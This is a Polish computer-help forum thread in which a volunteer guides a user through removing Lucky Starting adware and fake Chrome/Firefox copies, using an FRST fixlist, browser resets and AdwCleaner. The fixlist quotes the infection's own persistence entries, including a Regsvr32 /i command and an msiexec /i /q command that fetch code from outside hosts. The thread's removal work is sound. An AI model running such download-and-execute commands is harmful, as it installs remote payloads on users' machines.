[Lucky Starting] Adware - reklamy, fałszywa przeglądarka i możliwe inne

Clear · 24 Kwietnia 2017

Witam,

Znajomy poprosił mnie o pomoc z usunięciem problemów na jego komputerze. Została zainstalowana aplikacja Lucky Starting była główna strona startowa w FF i Chrome , najprawdopodobniej także inne warianty podobnych zagrożeń. Twierdzi także, ze FF miał zostać doinstalowany samodzielnie

Objawy:

- fałszywy Chrome, wolno startujący system, wzmożona ilość reklam, przekierowywanie na inne strony internetowe, w tym wyszukiwarki, niedziałające wtyczki.

Podejrzewam, że źródłem problemu mogą być strony porno.

Logi:
FRST nie był w stanie dokonać kopii rejestru - wyskoczylo kilka bledow o braku dostępu do kluczy rejestru.

W systemie został zainstalowany przeze mnie TeamViewer w dniu dzisiejszym, celem dokończenia procesu sprawdzania systemu już zdalnie ze swojego domu.

Miszel03 · 25 Kwietnia 2017

System jest zainfekowany przez adware. Widoczne są dwie fałszywe wyszukiwarki podszywające się pod Google Chrome oraz Mozilla FireFox (której nawet nie ma zainstalowanej w systemie). Oprócz tego inne adware: uruchamiające strony w przeglądarce, nakładające blokady typu Debugger etc. W systemie sprzątam, kasuję infekcję, resztki po programach i czyszczę pliki tymczasowe.

Instalkę z DobrychProgramów mającą Asystena Pobierania kasuję z katalogu Pobrane. Ten instalator ma zintegrowane adware i kto wie czy to właśnie nie on doprowadził do infekcji - KLIK.

1. Otwórz Notatnik w nim wklej:

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Hotben
RemoveDirectory: C:\Users\Janusz\AppData\Local\Hotben
Task: {0799A11B-BBCE-415E-8524-1C733F6F6689} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku 
Task: {2524CC03-F09A-46EF-892D-6174963B19D8} - \WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 -> Brak pliku 
Task: {44AF63F8-B7C5-4730-95AD-D0365E220B1F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku 
Task: {77F28D2F-FA47-4C2C-B721-7C270588F307} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku 
Task: {9BF3A04E-404B-433E-A4D6-788369AFB24C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku 
Task: {B9962562-7BA3-446C-8C2D-1001B91445AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku 
Task: {F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== scrobj.dll
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335}] => (Allow) C:\Program Files (x86)\Hotben\Application\chrome.exe
FirewallRules: [{A21039B9-F973-45F9-9E02-6D0CAA4F2841}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{AA08C75C-F2DB-4174-B872-5B02748EAF9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Janusz\AppData\Local\Firefox
RemoveDirectory: C:\Users\Janusz\AppData\Roaming\Firefox
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-18] () 
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> DefaultScope {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = 
SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = 
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) 
U2 Kitty; C:\Users\Janusz\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [brak podpisu cyfrowego] 
R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [brak podpisu cyfrowego]
S2 HWDeviceService64.exe; "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service [X]
U3 ugldipob; C:\Users\Janusz\AppData\Local\Temp\ugldipob.sys [56584 2017-04-24] (GMER) [brak podpisu cyfrowego] 
S3 ew_hwusbdev; \SystemRoot\system32\DRIVERS\ew_hwusbdev.sys [X]
S3 ew_usbenumfilter; \SystemRoot\System32\drivers\ew_usbenumfilter.sys [X]
S3 huawei_cdcacm; \SystemRoot\system32\DRIVERS\ew_jucdcacm.sys [X]
S3 huawei_ext_ctrl; \SystemRoot\System32\drivers\ew_juextctrl.sys [X]
S3 huawei_wwanecm; \SystemRoot\System32\drivers\ew_juwwanecm.sys [X]
2017-04-06 12:42 - 2017-04-06 12:42 - 01255768 _____ ( ) C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Janusz\AppData\Local\Mozilla
C:\Users\Janusz\AppData\Roaming\Mozilla
C:\Users\Janusz\AppData\Roaming\Profiles
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

Zresetuj synchronizację (o ile włączona): KLIK.
Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
Ustaw tą lub jakąkolwiek inną zaufaną przeglądarkę jako domyślną - skromnie sugeruję Google Chrome - KLIK.
Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.

4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

hotben;firefox

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum.

6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Clear · 25 Kwietnia 2017

Odnośnie do punktu 5, po pobraniu aplikacji AdwCleaner i uruchomieniu, pojawił się komunikat o nieaktualności aplikacji. Z uwagi na to, że czasami starsze wersje programu działają lepiej od nowych, a ja od sporego czasu nie jestem na bieżąco, postanowiłem korzystać z wersji programu, do której linkowano (6.045). AdwCleaner znalazł 20 zagrożeń. W wynikach wyszły 2 ścieżki. Jeśli program winien się zaktualizować, proszę o informację.

Jako domyślną przeglądarkę, na tę chwilę ustawiłem Microsoft Edge, która jest najbezpieczniejszym rozwiązaniem do momentu usunięcia infekcji. Załączam logi.

Punkt 2 - Chrome uruchomiłem bezporednio z lokalizacji właściwej przeglądarki. Nie było zainstalowanych podejrzanych dodatków i wyszukiwarek (przed daniem pierwszych logów była tylko Yahoo, a strona startowa luckystarting - usunięte). Zresetowano, usunięto wszystkie wyszukiwarki poza google i dodatki, zainstalowano uBlock Origin zamiast posiadanego wcześniej Adblocka Plus.

na taskbarze (quickLaunch) nadal są skróty do aplikacji Firefox i Chrome